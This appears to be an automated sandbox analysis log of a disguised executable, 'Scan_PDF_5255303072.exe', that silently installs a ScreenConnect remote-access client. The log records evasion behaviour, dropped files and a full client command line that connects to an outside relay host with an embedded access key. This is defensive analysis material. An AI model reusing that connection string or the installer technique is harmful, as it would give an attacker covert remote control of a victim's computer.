Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 1920000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 32B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 2FB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 6A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 6120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 6A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 7A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 8A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 7A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: 8CD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 3C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1A640000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 2390000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1A490000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7A98.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI74FA.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe TID: 7888 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 7628 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 6176 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2618019863.00000000010BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: setup.msi.0.dr Binary or memory string: VMCi-
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.Scan_PDF_5255303072.exe.5760000.5.raw.unpack, NativeLibrary.cs Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsExtensions.cs Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: 0.0.Scan_PDF_5255303072.exe.8b78f8.3.raw.unpack, Program.cs Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation Jump to behavior
